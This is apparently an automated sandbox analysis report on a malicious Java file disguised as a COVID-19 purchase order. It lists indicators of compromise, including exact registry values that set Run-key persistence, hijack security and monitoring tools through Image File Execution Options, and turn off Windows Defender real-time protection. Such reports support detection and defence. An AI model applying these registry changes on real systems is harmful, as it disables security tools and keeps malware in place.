8fa51db15722c9e5ae2ff0344cea3442c090a70f99ebf382e65e39ff1645e37d

Analysis

max time kernel
146s
max time network
143s
platform
windows10_x64
resource
win10v200430
submitted
07/07/2020, 09:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO For-COVID-19 Products.jar
Size

402KB
MD5

1d5620ec8f5dc6de6d0c98c53efc9e5b
SHA1

08fff82996a4590474ad95c43cf0ffb1df604f87
SHA256

8fa51db15722c9e5ae2ff0344cea3442c090a70f99ebf382e65e39ff1645e37d
SHA512

0d9501cdbb7213c37f370b867247a1b969c575068a4c45d72efdf559eb73a7baca173cef7df9b198fa7b38f6b735a47437ef794a3dc1cf8d96bf4fbebe625622

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
908	java.exe

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
732	attrib.exe
2768	attrib.exe
512	attrib.exe
2216	attrib.exe
3940	attrib.exe
3736	attrib.exe
1952	attrib.exe
4020	attrib.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\CROXxDB = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\rMnZL\\Suteu.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\CROXxDB = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\rMnZL\\Suteu.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
908	java.exe

Suspicious use of AdjustPrivilegeToken 164 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3904	WMIC.exe
Token: SeSecurityPrivilege	3904	WMIC.exe
Token: SeTakeOwnershipPrivilege	3904	WMIC.exe
Token: SeLoadDriverPrivilege	3904	WMIC.exe
Token: SeSystemProfilePrivilege	3904	WMIC.exe
Token: SeSystemtimePrivilege	3904	WMIC.exe
Token: SeProfSingleProcessPrivilege	3904	WMIC.exe
Token: SeIncBasePriorityPrivilege	3904	WMIC.exe
Token: SeCreatePagefilePrivilege	3904	WMIC.exe
Token: SeBackupPrivilege	3904	WMIC.exe
Token: SeRestorePrivilege	3904	WMIC.exe
Token: SeShutdownPrivilege	3904	WMIC.exe
Token: SeDebugPrivilege	3904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3904	WMIC.exe
Token: SeRemoteShutdownPrivilege	3904	WMIC.exe
Token: SeUndockPrivilege	3904	WMIC.exe
Token: SeManageVolumePrivilege	3904	WMIC.exe
Token: 33	3904	WMIC.exe
Token: 34	3904	WMIC.exe
Token: 35	3904	WMIC.exe
Token: 36	3904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3904	WMIC.exe
Token: SeSecurityPrivilege	3904	WMIC.exe
Token: SeTakeOwnershipPrivilege	3904	WMIC.exe
Token: SeLoadDriverPrivilege	3904	WMIC.exe
Token: SeSystemProfilePrivilege	3904	WMIC.exe
Token: SeSystemtimePrivilege	3904	WMIC.exe
Token: SeProfSingleProcessPrivilege	3904	WMIC.exe
Token: SeIncBasePriorityPrivilege	3904	WMIC.exe
Token: SeCreatePagefilePrivilege	3904	WMIC.exe
Token: SeBackupPrivilege	3904	WMIC.exe
Token: SeRestorePrivilege	3904	WMIC.exe
Token: SeShutdownPrivilege	3904	WMIC.exe
Token: SeDebugPrivilege	3904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3904	WMIC.exe
Token: SeRemoteShutdownPrivilege	3904	WMIC.exe
Token: SeUndockPrivilege	3904	WMIC.exe
Token: SeManageVolumePrivilege	3904	WMIC.exe
Token: 33	3904	WMIC.exe
Token: 34	3904	WMIC.exe
Token: 35	3904	WMIC.exe
Token: 36	3904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3864	WMIC.exe
Token: SeSecurityPrivilege	3864	WMIC.exe
Token: SeTakeOwnershipPrivilege	3864	WMIC.exe
Token: SeLoadDriverPrivilege	3864	WMIC.exe
Token: SeSystemProfilePrivilege	3864	WMIC.exe
Token: SeSystemtimePrivilege	3864	WMIC.exe
Token: SeProfSingleProcessPrivilege	3864	WMIC.exe
Token: SeIncBasePriorityPrivilege	3864	WMIC.exe
Token: SeCreatePagefilePrivilege	3864	WMIC.exe
Token: SeBackupPrivilege	3864	WMIC.exe
Token: SeRestorePrivilege	3864	WMIC.exe
Token: SeShutdownPrivilege	3864	WMIC.exe
Token: SeDebugPrivilege	3864	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3864	WMIC.exe
Token: SeRemoteShutdownPrivilege	3864	WMIC.exe
Token: SeUndockPrivilege	3864	WMIC.exe
Token: SeManageVolumePrivilege	3864	WMIC.exe
Token: 33	3864	WMIC.exe
Token: 34	3864	WMIC.exe
Token: 35	3864	WMIC.exe
Token: 36	3864	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3864	WMIC.exe
Token: SeSecurityPrivilege	3864	WMIC.exe
Token: SeTakeOwnershipPrivilege	3864	WMIC.exe
Token: SeLoadDriverPrivilege	3864	WMIC.exe
Token: SeSystemProfilePrivilege	3864	WMIC.exe
Token: SeSystemtimePrivilege	3864	WMIC.exe
Token: SeProfSingleProcessPrivilege	3864	WMIC.exe
Token: SeIncBasePriorityPrivilege	3864	WMIC.exe
Token: SeCreatePagefilePrivilege	3864	WMIC.exe
Token: SeBackupPrivilege	3864	WMIC.exe
Token: SeRestorePrivilege	3864	WMIC.exe
Token: SeShutdownPrivilege	3864	WMIC.exe
Token: SeDebugPrivilege	3864	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3864	WMIC.exe
Token: SeRemoteShutdownPrivilege	3864	WMIC.exe
Token: SeUndockPrivilege	3864	WMIC.exe
Token: SeManageVolumePrivilege	3864	WMIC.exe
Token: 33	3864	WMIC.exe
Token: 34	3864	WMIC.exe
Token: 35	3864	WMIC.exe
Token: 36	3864	WMIC.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3688	WMIC.exe
Token: SeSecurityPrivilege	3688	WMIC.exe
Token: SeTakeOwnershipPrivilege	3688	WMIC.exe
Token: SeLoadDriverPrivilege	3688	WMIC.exe
Token: SeSystemProfilePrivilege	3688	WMIC.exe
Token: SeSystemtimePrivilege	3688	WMIC.exe
Token: SeProfSingleProcessPrivilege	3688	WMIC.exe
Token: SeIncBasePriorityPrivilege	3688	WMIC.exe
Token: SeCreatePagefilePrivilege	3688	WMIC.exe
Token: SeBackupPrivilege	3688	WMIC.exe
Token: SeRestorePrivilege	3688	WMIC.exe
Token: SeShutdownPrivilege	3688	WMIC.exe
Token: SeDebugPrivilege	3688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3688	WMIC.exe
Token: SeRemoteShutdownPrivilege	3688	WMIC.exe
Token: SeUndockPrivilege	3688	WMIC.exe
Token: SeManageVolumePrivilege	3688	WMIC.exe
Token: 33	3688	WMIC.exe
Token: 34	3688	WMIC.exe
Token: 35	3688	WMIC.exe
Token: 36	3688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3688	WMIC.exe
Token: SeSecurityPrivilege	3688	WMIC.exe
Token: SeTakeOwnershipPrivilege	3688	WMIC.exe
Token: SeLoadDriverPrivilege	3688	WMIC.exe
Token: SeSystemProfilePrivilege	3688	WMIC.exe
Token: SeSystemtimePrivilege	3688	WMIC.exe
Token: SeProfSingleProcessPrivilege	3688	WMIC.exe
Token: SeIncBasePriorityPrivilege	3688	WMIC.exe
Token: SeCreatePagefilePrivilege	3688	WMIC.exe
Token: SeBackupPrivilege	3688	WMIC.exe
Token: SeRestorePrivilege	3688	WMIC.exe
Token: SeShutdownPrivilege	3688	WMIC.exe
Token: SeDebugPrivilege	3688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3688	WMIC.exe
Token: SeRemoteShutdownPrivilege	3688	WMIC.exe
Token: SeUndockPrivilege	3688	WMIC.exe
Token: SeManageVolumePrivilege	3688	WMIC.exe
Token: 33	3688	WMIC.exe
Token: 34	3688	WMIC.exe
Token: 35	3688	WMIC.exe
Token: 36	3688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3952	powershell.exe
Token: SeSecurityPrivilege	3952	powershell.exe
Token: SeTakeOwnershipPrivilege	3952	powershell.exe
Token: SeLoadDriverPrivilege	3952	powershell.exe
Token: SeSystemProfilePrivilege	3952	powershell.exe
Token: SeSystemtimePrivilege	3952	powershell.exe
Token: SeProfSingleProcessPrivilege	3952	powershell.exe
Token: SeIncBasePriorityPrivilege	3952	powershell.exe
Token: SeCreatePagefilePrivilege	3952	powershell.exe
Token: SeBackupPrivilege	3952	powershell.exe
Token: SeRestorePrivilege	3952	powershell.exe
Token: SeShutdownPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeSystemEnvironmentPrivilege	3952	powershell.exe
Token: SeRemoteShutdownPrivilege	3952	powershell.exe
Token: SeUndockPrivilege	3952	powershell.exe
Token: SeManageVolumePrivilege	3952	powershell.exe
Token: 33	3952	powershell.exe
Token: 34	3952	powershell.exe
Token: 35	3952	powershell.exe
Token: 36	3952	powershell.exe
Token: SeDebugPrivilege	4116	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	3600	taskkill.exe
Token: SeDebugPrivilege	4224	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	412	taskkill.exe
Token: SeDebugPrivilege	4860	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe

Checks for installed software on the system 1 TTPs 38 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\rMnZL\Desktop.ini	java.exe
File created	C:\Users\Admin\rMnZL\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\rMnZL\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\rMnZL\Desktop.ini	attrib.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
4116	taskkill.exe
5056	taskkill.exe
4224	taskkill.exe
4904	taskkill.exe
2072	taskkill.exe
2848	taskkill.exe
412	taskkill.exe
3600	taskkill.exe
4860	taskkill.exe
2120	taskkill.exe
4024	taskkill.exe
2224	taskkill.exe
4516	taskkill.exe
3968	taskkill.exe
2196	taskkill.exe
4604	taskkill.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\TEgWc	java.exe
File opened for modification	C:\Windows\System32\TEgWc	java.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe

Suspicious use of WriteProcessMemory 386 IoCs

description	pid	Process	procid_target
PID 908 wrote to memory of 3480	908	java.exe	70
PID 908 wrote to memory of 3480	908	java.exe	70
PID 908 wrote to memory of 3900	908	java.exe	72
PID 908 wrote to memory of 3900	908	java.exe	72
PID 3900 wrote to memory of 3904	3900	cmd.exe	74
PID 3900 wrote to memory of 3904	3900	cmd.exe	74
PID 908 wrote to memory of 3572	908	java.exe	75
PID 908 wrote to memory of 3572	908	java.exe	75
PID 3572 wrote to memory of 3864	3572	cmd.exe	77
PID 3572 wrote to memory of 3864	3572	cmd.exe	77
PID 908 wrote to memory of 4020	908	java.exe	78
PID 908 wrote to memory of 4020	908	java.exe	78
PID 908 wrote to memory of 732	908	java.exe	80
PID 908 wrote to memory of 732	908	java.exe	80
PID 908 wrote to memory of 2768	908	java.exe	83
PID 908 wrote to memory of 2768	908	java.exe	83
PID 908 wrote to memory of 512	908	java.exe	84
PID 908 wrote to memory of 512	908	java.exe	84
PID 908 wrote to memory of 2216	908	java.exe	87
PID 908 wrote to memory of 2216	908	java.exe	87
PID 908 wrote to memory of 3940	908	java.exe	90
PID 908 wrote to memory of 3940	908	java.exe	90
PID 908 wrote to memory of 3736	908	java.exe	92
PID 908 wrote to memory of 3736	908	java.exe	92
PID 908 wrote to memory of 1952	908	java.exe	93
PID 908 wrote to memory of 1952	908	java.exe	93
PID 908 wrote to memory of 2820	908	java.exe	96
PID 908 wrote to memory of 2820	908	java.exe	96
PID 908 wrote to memory of 3952	908	java.exe	98
PID 908 wrote to memory of 3952	908	java.exe	98
PID 2820 wrote to memory of 1740	2820	cmd.exe	100
PID 2820 wrote to memory of 1740	2820	cmd.exe	100
PID 908 wrote to memory of 3984	908	java.exe	101
PID 908 wrote to memory of 3984	908	java.exe	101
PID 908 wrote to memory of 636	908	java.exe	103
PID 908 wrote to memory of 636	908	java.exe	103
PID 908 wrote to memory of 4024	908	java.exe	102
PID 908 wrote to memory of 4024	908	java.exe	102
PID 908 wrote to memory of 4008	908	java.exe	106
PID 908 wrote to memory of 4008	908	java.exe	106
PID 908 wrote to memory of 4044	908	java.exe	107
PID 908 wrote to memory of 4044	908	java.exe	107
PID 908 wrote to memory of 1532	908	java.exe	111
PID 908 wrote to memory of 1532	908	java.exe	111
PID 908 wrote to memory of 2860	908	java.exe	112
PID 908 wrote to memory of 2860	908	java.exe	112
PID 908 wrote to memory of 2052	908	java.exe	115
PID 908 wrote to memory of 2052	908	java.exe	115
PID 908 wrote to memory of 3036	908	java.exe	116
PID 908 wrote to memory of 3036	908	java.exe	116
PID 908 wrote to memory of 3168	908	java.exe	119
PID 908 wrote to memory of 3168	908	java.exe	119
PID 908 wrote to memory of 2196	908	java.exe	121
PID 908 wrote to memory of 2196	908	java.exe	121
PID 908 wrote to memory of 2036	908	java.exe	123
PID 908 wrote to memory of 2036	908	java.exe	123
PID 2820 wrote to memory of 1580	2820	cmd.exe	124
PID 2820 wrote to memory of 1580	2820	cmd.exe	124
PID 908 wrote to memory of 3084	908	java.exe	126
PID 908 wrote to memory of 3084	908	java.exe	126
PID 908 wrote to memory of 1532	908	java.exe	128
PID 908 wrote to memory of 1532	908	java.exe	128
PID 908 wrote to memory of 2224	908	java.exe	131
PID 908 wrote to memory of 2224	908	java.exe	131
PID 908 wrote to memory of 2128	908	java.exe	132
PID 908 wrote to memory of 2128	908	java.exe	132
PID 908 wrote to memory of 944	908	java.exe	135
PID 908 wrote to memory of 944	908	java.exe	135
PID 908 wrote to memory of 3600	908	java.exe	137
PID 908 wrote to memory of 3600	908	java.exe	137
PID 908 wrote to memory of 1992	908	java.exe	139
PID 908 wrote to memory of 1992	908	java.exe	139
PID 908 wrote to memory of 2848	908	java.exe	141
PID 908 wrote to memory of 2848	908	java.exe	141
PID 908 wrote to memory of 3784	908	java.exe	142
PID 908 wrote to memory of 3784	908	java.exe	142
PID 908 wrote to memory of 2500	908	java.exe	144
PID 908 wrote to memory of 2500	908	java.exe	144
PID 908 wrote to memory of 416	908	java.exe	147
PID 908 wrote to memory of 416	908	java.exe	147
PID 3784 wrote to memory of 3592	3784	cmd.exe	149
PID 3784 wrote to memory of 3592	3784	cmd.exe	149
PID 3784 wrote to memory of 2036	3784	cmd.exe	150
PID 3784 wrote to memory of 2036	3784	cmd.exe	150
PID 908 wrote to memory of 2848	908	java.exe	151
PID 908 wrote to memory of 2848	908	java.exe	151
PID 908 wrote to memory of 3920	908	java.exe	152
PID 908 wrote to memory of 3920	908	java.exe	152
PID 3920 wrote to memory of 3416	3920	cmd.exe	155
PID 3920 wrote to memory of 3416	3920	cmd.exe	155
PID 3920 wrote to memory of 1784	3920	cmd.exe	156
PID 3920 wrote to memory of 1784	3920	cmd.exe	156
PID 908 wrote to memory of 4024	908	java.exe	157
PID 908 wrote to memory of 4024	908	java.exe	157
PID 908 wrote to memory of 2836	908	java.exe	158
PID 908 wrote to memory of 2836	908	java.exe	158
PID 4024 wrote to memory of 2036	4024	cmd.exe	161
PID 4024 wrote to memory of 2036	4024	cmd.exe	161
PID 2836 wrote to memory of 3688	2836	cmd.exe	162
PID 2836 wrote to memory of 3688	2836	cmd.exe	162
PID 4024 wrote to memory of 2196	4024	cmd.exe	163
PID 4024 wrote to memory of 2196	4024	cmd.exe	163
PID 908 wrote to memory of 1288	908	java.exe	164
PID 908 wrote to memory of 1288	908	java.exe	164
PID 1288 wrote to memory of 944	1288	cmd.exe	166
PID 1288 wrote to memory of 944	1288	cmd.exe	166
PID 1288 wrote to memory of 2500	1288	cmd.exe	167
PID 1288 wrote to memory of 2500	1288	cmd.exe	167
PID 908 wrote to memory of 3948	908	java.exe	168
